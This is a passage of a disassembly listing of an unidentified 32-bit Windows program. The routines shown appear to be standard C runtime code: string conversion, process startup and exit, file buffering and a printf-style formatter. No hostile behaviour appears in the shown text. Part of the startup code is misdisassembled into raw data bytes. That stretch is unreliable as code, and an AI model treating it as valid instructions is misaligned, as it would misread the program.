loc_4128C9: ; CODE XREF: seg000:004128AF�j
; seg000:004128B6�j
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_4128CC proc near ; CODE XREF: sub_40F2C4+55�p
; sub_40FC75+236�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_4128E3
loc_4128D9: ; CODE XREF: sub_4128CC+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_4128D9
loc_4128E3: ; CODE XREF: sub_4128CC+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_4128CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4128E9 proc near ; CODE XREF: sub_40F2C4+19�p
; sub_40F2C4+49�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_4129B6
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_4129E3
cmp ds:dword_45F8D0, esi
jnz short loc_41293A
cmp edi, esi
jbe loc_4129E3
loc_412919: ; CODE XREF: sub_4128E9+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_4129E3
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_412919
jmp loc_4129E3
; ---------------------------------------------------------------------------
loc_41293A: ; CODE XREF: sub_4128E9+26�j
mov ebx, [ebp+arg_4]
mov esi, ds:dword_41C120
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push ds:dword_45F8E0
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_4129E2
call ds:dword_41C068 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_412974
loc_412965: ; CODE XREF: sub_4128E9+CB�j
; sub_4128E9+F7�j
mov ds:dword_45F844, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4129E3
; ---------------------------------------------------------------------------
loc_412974: ; CODE XREF: sub_4128E9+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_41297C: ; CODE XREF: sub_4128E9+B3�j
mov cl, [eax]
test cl, cl
jz short loc_41299E
mov edx, ds:dword_42E190
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_412993
inc eax
loc_412993: ; CODE XREF: sub_4128E9+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_41297C
loc_41299E: ; CODE XREF: sub_4128E9+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push ds:dword_45F8E0
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_4129E3
jmp short loc_412965
; ---------------------------------------------------------------------------
loc_4129B6: ; CODE XREF: sub_4128E9+F�j
cmp ds:dword_45F8D0, esi
jnz short loc_4129C9
push [ebp+arg_4]
call sub_410B60
pop ecx
jmp short loc_4129E3
; ---------------------------------------------------------------------------
loc_4129C9: ; CODE XREF: sub_4128E9+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push ds:dword_45F8E0
call ds:dword_41C120 ; MultiByteToWideChar
cmp eax, esi
jz short loc_412965
loc_4129E2: ; CODE XREF: sub_4128E9+6B�j
dec eax
loc_4129E3: ; CODE XREF: sub_4128E9+1A�j
; sub_4128E9+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4128E9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C658
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call ds:dword_41C154 ; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_45F85C, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_45F858, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_45F854, ecx
shr eax, 10h
mov ds:dword_45F850, eax
xor esi, esi
push esi
call sub_4134D6
pop ecx
test eax, eax
jnz short loc_412A54
push 1Ch
call sub_412B03
pop ecx
loc_412A54: ; CODE XREF: seg000:00412A4A�j
mov [ebp-4], esi
call loc_417992
call near ptr 0C60004h
and ds:dword_460EA4[ebx], 0FFFFFFE8h
hlt
; ---------------------------------------------------------------------------
db 4Dh, 2 dup(0)
dd 45F890A3h, 4B9DE800h, 0DFE80000h, 0E800004Ah, 0FFFFFB1Ah
dd 8DD07589h, 0E850A445h, 90D578h, 4A70E859h, 45890000h
dd 0D045F69Ch, 0F067401h, 0EBD445B7h, 580A6A03h, 9C75FF50h
dd 55E85656h, 2A0092D5h, 602FE850h, 4589FFFFh, 8E850A0h
dd 8BFFFFFBh, 88BEC45h, 4D89098Bh, 0E8515098h, 48AEh, 8BC35959h
dd 75FFE865h, 0FAFAE898h
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_412ADE proc near ; CODE XREF: seg000:004116A8�p
; seg000:004175A8�p ...
arg_0 = dword ptr 4
cmp ds:dword_45F898, 1
jnz short loc_412AEC
call sub_417C20
loc_412AEC: ; CODE XREF: sub_412ADE+7�j
push [esp+arg_0]
call near ptr sub_417C59
push 0FFh
call ds:dword_42E180
pop ecx
pop ecx
retn
sub_412ADE endp
; =============== S U B R O U T I N E =======================================
sub_412B03 proc near ; CODE XREF: seg000:00412A4E�p
arg_0 = dword ptr 4
cmp ds:dword_45F898, 1
jnz short loc_412B11
call sub_417C20
loc_412B11: ; CODE XREF: sub_412B03+7�j
push [esp+arg_0]
call near ptr sub_417C59
pop ecx
push 0FFh
call ds:dword_41C0F8 ; ExitProcess
retn
sub_412B03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412B27 proc near ; CODE XREF: sub_41050B+46�p
; sub_410A8A+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_412C30
test al, 40h
jnz loc_412C30
test al, 1
jz short loc_412B5F
and dword ptr [esi+4], 0
test al, 10h
jz loc_412C30
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_412B5F: ; CODE XREF: sub_412B27+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_412B99
cmp esi, offset dword_42E8A8
jz short loc_412B87
cmp esi, offset dword_42E8C8
jnz short loc_412B92
loc_412B87: ; CODE XREF: sub_412B27+56�j
push ebx
call sub_417F9D
test eax, eax
pop ecx
jnz short loc_412B99
loc_412B92: ; CODE XREF: sub_412B27+5E�j
push esi
call sub_417F59
pop ecx
loc_412B99: ; CODE XREF: sub_412B27+4E�j
; sub_412B27+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_412C06
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_412BC9
push edi
push eax
push ebx
call sub_417DAC
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_412BFC
; ---------------------------------------------------------------------------
loc_412BC9: ; CODE XREF: sub_412B27+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_412BE4
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_460B60[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_412BE9
; ---------------------------------------------------------------------------
loc_412BE4: ; CODE XREF: sub_412B27+A5�j
mov eax, offset dword_42E7F0
loc_412BE9: ; CODE XREF: sub_412B27+BB�j
test byte ptr [eax+4], 20h
jz short loc_412BFC
push 2
push 0
push ebx
call sub_4169A2
add esp, 0Ch
loc_412BFC: ; CODE XREF: sub_412B27+A0�j
; sub_412B27+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_412C1A
; ---------------------------------------------------------------------------
loc_412C06: ; CODE XREF: sub_412B27+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_417DAC
add esp, 0Ch
mov [ebp+arg_4], eax
loc_412C1A: ; CODE XREF: sub_412B27+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_412C26
or dword ptr [esi+0Ch], 20h
jmp short loc_412C35
; ---------------------------------------------------------------------------
loc_412C26: ; CODE XREF: sub_412B27+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_412C38
; ---------------------------------------------------------------------------
loc_412C30: ; CODE XREF: sub_412B27+10�j
; sub_412B27+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_412C35: ; CODE XREF: sub_412B27+FD�j
or eax, 0FFFFFFFFh
loc_412C38: ; CODE XREF: sub_412B27+107�j
pop esi
pop ebx
pop ebp
retn
sub_412B27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412C3C proc near ; CODE XREF: sub_41050B+29�p
; sub_410A8A+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_413355
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_412C70
; ---------------------------------------------------------------------------
loc_412C68: ; CODE XREF: sub_412C3C+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_412C70: ; CODE XREF: sub_412C3C+2A�j
cmp [ebp+var_14], edx
jl loc_413355
cmp bl, 20h
jl short loc_412C91
cmp bl, 78h
jg short loc_412C91
movsx eax, bl
mov al, ds:byte_41C644[eax]
and eax, 0Fh
jmp short loc_412C93
; ---------------------------------------------------------------------------
loc_412C91: ; CODE XREF: sub_412C3C+40�j
; sub_412C3C+45�j
xor eax, eax
loc_412C93: ; CODE XREF: sub_412C3C+53�j
movsx eax, ds:byte_41C664[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_413344 ; default
jmp ds:off_41335D[eax*4] ; switch jump
loc_412CB1: ; DATA XREF: seg000:off_41335D�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 00412CAA case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412CCC: ; CODE XREF: sub_412C3C+6E�j
; DATA XREF: seg000:off_41335D�o
movsx eax, bl ; jumptable 00412CAA case 2
sub eax, 20h
jz short loc_412D0F
sub eax, 3
jz short loc_412D06
sub eax, 8
jz short loc_412CFD
dec eax
dec eax
jz short loc_412CF4
sub eax, 3
jnz loc_413344 ; default
or [ebp+var_4], 8
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412CF4: ; CODE XREF: sub_412C3C+A4�j
or [ebp+var_4], 4
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412CFD: ; CODE XREF: sub_412C3C+A0�j
or [ebp+var_4], 1
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412D06: ; CODE XREF: sub_412C3C+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412D0F: ; CODE XREF: sub_412C3C+96�j
or [ebp+var_4], 2
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412D18: ; CODE XREF: sub_412C3C+6E�j
; DATA XREF: seg000:off_41335D�o
cmp bl, 2Ah ; jumptable 00412CAA case 3
jnz short loc_412D40
lea eax, [ebp+arg_8]
push eax
call sub_41341B
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_413344 ; default
or [ebp+var_4], 4
neg eax
loc_412D38: ; CODE XREF: sub_412C3C+111�j
mov [ebp+var_20], eax
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412D40: ; CODE XREF: sub_412C3C+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_412D38
; ---------------------------------------------------------------------------
loc_412D4F: ; CODE XREF: sub_412C3C+6E�j
; DATA XREF: seg000:off_41335D�o
mov [ebp+var_10], edx ; jumptable 00412CAA case 4
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412D57: ; CODE XREF: sub_412C3C+6E�j
; DATA XREF: seg000:off_41335D�o
cmp bl, 2Ah ; jumptable 00412CAA case 5
jnz short loc_412D7A
lea eax, [ebp+arg_8]
push eax
call sub_41341B
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_413344 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412D7A: ; CODE XREF: sub_412C3C+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412D8C: ; CODE XREF: sub_412C3C+6E�j
; DATA XREF: seg000:off_41335D�o
cmp bl, 49h ; jumptable 00412CAA case 6
jz short loc_412DBF
cmp bl, 68h
jz short loc_412DB6
cmp bl, 6Ch
jz short loc_412DAD
cmp bl, 77h
jnz loc_413344 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412DAD: ; CODE XREF: sub_412C3C+15D�j
or [ebp+var_4], 10h
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412DB6: ; CODE XREF: sub_412C3C+158�j
or [ebp+var_4], 20h
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412DBF: ; CODE XREF: sub_412C3C+153�j
cmp byte ptr [edi], 36h
jnz short loc_412DD8
cmp byte ptr [edi+1], 34h
jnz short loc_412DD8
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412DD8: ; CODE XREF: sub_412C3C+186�j
; sub_412C3C+18C�j
mov [ebp+var_30], edx
loc_412DDB: ; CODE XREF: sub_412C3C+6E�j
; DATA XREF: seg000:off_41335D�o
mov ecx, ds:dword_42E190 ; jumptable 00412CAA case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_412E07
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41337D
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_412E07: ; CODE XREF: sub_412C3C+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41337D
add esp, 0Ch
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_412E1F: ; CODE XREF: sub_412C3C+6E�j
; DATA XREF: seg000:off_41335D�o
movsx eax, bl ; jumptable 00412CAA case 7
cmp eax, 67h
jg loc_413047
cmp eax, 65h
jge loc_412ECA
cmp eax, 58h
jg loc_412F28
jz loc_4130BB
sub eax, 43h
jz loc_412EEB
dec eax
dec eax
jz short loc_412EC0
dec eax
dec eax
jz short loc_412EC0
sub eax, 0Ch
jnz loc_413246
test word ptr [ebp+var_4], 830h
jnz short loc_412E69
or byte ptr [ebp+var_4+1], 8
loc_412E69: ; CODE XREF: sub_412C3C+227�j
; sub_412C3C+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_412E76
mov esi, 7FFFFFFFh
loc_412E76: ; CODE XREF: sub_412C3C+233�j
lea eax, [ebp+arg_8]
push eax
call sub_41341B
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_41308F
test ecx, ecx
jnz short loc_412E9E
mov ecx, ds:dword_42E18C
mov [ebp+var_8], ecx
loc_412E9E: ; CODE XREF: sub_412C3C+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_412EA7: ; CODE XREF: sub_412C3C+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_413086
cmp word ptr [eax], 0
jz loc_413086
inc eax
inc eax
jmp short loc_412EA7
; ---------------------------------------------------------------------------
loc_412EC0: ; CODE XREF: sub_412C3C+212�j
; sub_412C3C+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_412ECA: ; CODE XREF: sub_412C3C+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_412FAE
mov [ebp+var_10], 6
jmp loc_412FBC
; ---------------------------------------------------------------------------
loc_412EEB: ; CODE XREF: sub_412C3C+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_412EF7
or byte ptr [ebp+var_4+1], 8
loc_412EF7: ; CODE XREF: sub_412C3C+2B5�j
; sub_412C3C+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_412F3E
call sub_413438
push eax
lea eax, [ebp+var_248]
push eax
call sub_41807C
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_412F51
mov [ebp+var_28], 1
jmp short loc_412F51
; ---------------------------------------------------------------------------
loc_412F28: ; CODE XREF: sub_412C3C+1FB�j
sub eax, 5Ah
jz short loc_412F5F
sub eax, 9
jz short loc_412EF7
dec eax
jz loc_413121
jmp loc_413246
; ---------------------------------------------------------------------------
loc_412F3E: ; CODE XREF: sub_412C3C+2C5�j
call sub_41341B
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_412F51: ; CODE XREF: sub_412C3C+2E1�j
; sub_412C3C+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_413246
; ---------------------------------------------------------------------------
loc_412F5F: ; CODE XREF: sub_412C3C+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_41341B
test eax, eax
pop ecx
jz short loc_412FA0
mov ecx, [eax+4]
test ecx, ecx
jz short loc_412FA0
test byte ptr [ebp+var_4+1], 8
jz short loc_412F91
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_413246
; ---------------------------------------------------------------------------
loc_412F91: ; CODE XREF: sub_412C3C+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_413243
; ---------------------------------------------------------------------------
loc_412FA0: ; CODE XREF: sub_412C3C+32F�j
; sub_412C3C+336�j
mov eax, ds:dword_42E188
mov [ebp+var_8], eax
push eax
jmp loc_41303C
; ---------------------------------------------------------------------------
loc_412FAE: ; CODE XREF: sub_412C3C+29D�j
jnz short loc_412FBC
cmp bl, 67h
jnz short loc_412FBC
mov [ebp+var_10], 1
loc_412FBC: ; CODE XREF: sub_412C3C+2AA�j
; sub_412C3C:loc_412FAE�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call ds:dword_42E4C8
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_41300E
cmp [ebp+var_10], 0
jnz short loc_41300E
lea eax, [ebp+var_248]
push eax
call ds:dword_42E4D4
pop ecx
loc_41300E: ; CODE XREF: sub_412C3C+3BC�j
; sub_412C3C+3C2�j
cmp bl, 67h
jnz short loc_413025
test esi, esi
jnz short loc_413025
lea eax, [ebp+var_248]
push eax
call ds:dword_42E4CC
pop ecx
loc_413025: ; CODE XREF: sub_412C3C+3D5�j
; sub_412C3C+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_41303B
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_41303B: ; CODE XREF: sub_412C3C+3F0�j
push edi
loc_41303C: ; CODE XREF: sub_412C3C+36D�j
call sub_410B60
pop ecx
jmp loc_413243
; ---------------------------------------------------------------------------
loc_413047: ; CODE XREF: sub_412C3C+1E9�j
sub eax, 69h
jz loc_413121
sub eax, 5
jz loc_4130F7
dec eax
jz loc_4130E4
dec eax
jz short loc_4130B4
sub eax, 3
jz loc_412E69
dec eax
dec eax
jz loc_413125
sub eax, 3
jnz loc_413246
mov [ebp+var_2C], 27h
jmp short loc_4130C2
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: sub_412C3C+270�j
; sub_412C3C+27A�j
sub eax, ecx
sar eax, 1
jmp loc_413243
; ---------------------------------------------------------------------------
loc_41308F: ; CODE XREF: sub_412C3C+24F�j
test ecx, ecx
jnz short loc_41309C
mov ecx, ds:dword_42E188
mov [ebp+var_8], ecx
loc_41309C: ; CODE XREF: sub_412C3C+455�j
mov eax, ecx
loc_41309E: ; CODE XREF: sub_412C3C+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_4130AD
cmp byte ptr [eax], 0
jz short loc_4130AD
inc eax
jmp short loc_41309E
; ---------------------------------------------------------------------------
loc_4130AD: ; CODE XREF: sub_412C3C+467�j
; sub_412C3C+46C�j
sub eax, ecx
jmp loc_413243
; ---------------------------------------------------------------------------
loc_4130B4: ; CODE XREF: sub_412C3C+425�j
mov [ebp+var_10], 8
loc_4130BB: ; CODE XREF: sub_412C3C+201�j
mov [ebp+var_2C], 7
loc_4130C2: ; CODE XREF: sub_412C3C+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_41312C
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_41312C
; ---------------------------------------------------------------------------
loc_4130E4: ; CODE XREF: sub_412C3C+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_41312C
or byte ptr [ebp+var_4+1], 2
jmp short loc_41312C
; ---------------------------------------------------------------------------
loc_4130F7: ; CODE XREF: sub_412C3C+417�j
lea eax, [ebp+arg_8]
push eax
call sub_41341B
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_413110
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413110: ; CODE XREF: sub_412C3C+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_413115: ; CODE XREF: sub_412C3C+4D2�j
mov [ebp+var_28], 1
jmp loc_413344 ; default
; ---------------------------------------------------------------------------
loc_413121: ; CODE XREF: sub_412C3C+2F7�j
; sub_412C3C+40E�j
or [ebp+var_4], 40h
loc_413125: ; CODE XREF: sub_412C3C+432�j
mov [ebp+var_C], 0Ah
loc_41312C: ; CODE XREF: sub_412C3C+491�j
; sub_412C3C+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_41313E
lea eax, [ebp+arg_8]
push eax
call sub_413428
pop ecx
jmp short loc_41317F
; ---------------------------------------------------------------------------
loc_41313E: ; CODE XREF: sub_412C3C+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_413165
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41315A
call sub_41341B
pop ecx
movsx eax, ax
loc_413157: ; CODE XREF: sub_412C3C+527�j
; sub_412C3C+539�j
cdq
jmp short loc_41317F
; ---------------------------------------------------------------------------
loc_41315A: ; CODE XREF: sub_412C3C+510�j
call sub_41341B
pop ecx
movzx eax, ax
jmp short loc_413157
; ---------------------------------------------------------------------------
loc_413165: ; CODE XREF: sub_412C3C+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_413177
call sub_41341B
pop ecx
jmp short loc_413157
; ---------------------------------------------------------------------------
loc_413177: ; CODE XREF: sub_412C3C+531�j
call sub_41341B
pop ecx
xor edx, edx
loc_41317F: ; CODE XREF: sub_412C3C+500�j
; sub_412C3C+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_4131A0
test edx, edx
jg short loc_4131A0
jl short loc_41318F
test eax, eax
jnb short loc_4131A0
loc_41318F: ; CODE XREF: sub_412C3C+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_4131A4
; ---------------------------------------------------------------------------
loc_4131A0: ; CODE XREF: sub_412C3C+547�j
; sub_412C3C+54B�j ...
mov esi, eax
mov edi, edx
loc_4131A4: ; CODE XREF: sub_412C3C+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_4131AD
and edi, 0
loc_4131AD: ; CODE XREF: sub_412C3C+56C�j
cmp [ebp+var_10], 0
jge short loc_4131BC
mov [ebp+var_10], 1
jmp short loc_4131C0
; ---------------------------------------------------------------------------
loc_4131BC: ; CODE XREF: sub_412C3C+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_4131C0: ; CODE XREF: sub_412C3C+57E�j
mov eax, esi
or eax, edi
jnz short loc_4131CA
and [ebp+var_1C], 0
loc_4131CA: ; CODE XREF: sub_412C3C+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_4131D0: ; CODE XREF: sub_412C3C+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_4131E0
mov eax, esi
or eax, edi
jz short loc_41321B
loc_4131E0: ; CODE XREF: sub_412C3C+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_412100
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_412180
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_413211
add ebx, [ebp+var_2C]
loc_413211: ; CODE XREF: sub_412C3C+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_4131D0
; ---------------------------------------------------------------------------
loc_41321B: ; CODE XREF: sub_412C3C+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_413246
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_413239
test eax, eax
jnz short loc_413246
loc_413239: ; CODE XREF: sub_412C3C+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_413243: ; CODE XREF: sub_412C3C+35F�j
; sub_412C3C+406�j ...
mov [ebp+var_C], eax
loc_413246: ; CODE XREF: sub_412C3C+21B�j
; sub_412C3C+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_413344 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_41327E
test bh, 1
jz short loc_413263
mov [ebp+var_16], 2Dh
jmp short loc_413277
; ---------------------------------------------------------------------------
loc_413263: ; CODE XREF: sub_412C3C+61F�j
test bl, 1
jz short loc_41326E
mov [ebp+var_16], 2Bh
jmp short loc_413277
; ---------------------------------------------------------------------------
loc_41326E: ; CODE XREF: sub_412C3C+62A�j
test bl, 2
jz short loc_41327E
mov [ebp+var_16], 20h
loc_413277: ; CODE XREF: sub_412C3C+625�j
; sub_412C3C+630�j
mov [ebp+var_1C], 1
loc_41327E: ; CODE XREF: sub_412C3C+61A�j
; sub_412C3C+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_41329E
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4133B2
add esp, 10h
loc_41329E: ; CODE XREF: sub_412C3C+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_4133E3
add esp, 10h
test bl, 8
jz short loc_4132D0
test bl, 4
jnz short loc_4132D0
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_4133B2
add esp, 10h
loc_4132D0: ; CODE XREF: sub_412C3C+67B�j
; sub_412C3C+680�j
cmp [ebp+var_24], 0
jz short loc_413317
cmp [ebp+var_C], 0
jle short loc_413317
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_4132E5: ; CODE XREF: sub_412C3C+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_41807C
pop ecx
test eax, eax
pop ecx
jle short loc_41332C
lea ecx, [ebp+var_14]
push ecx
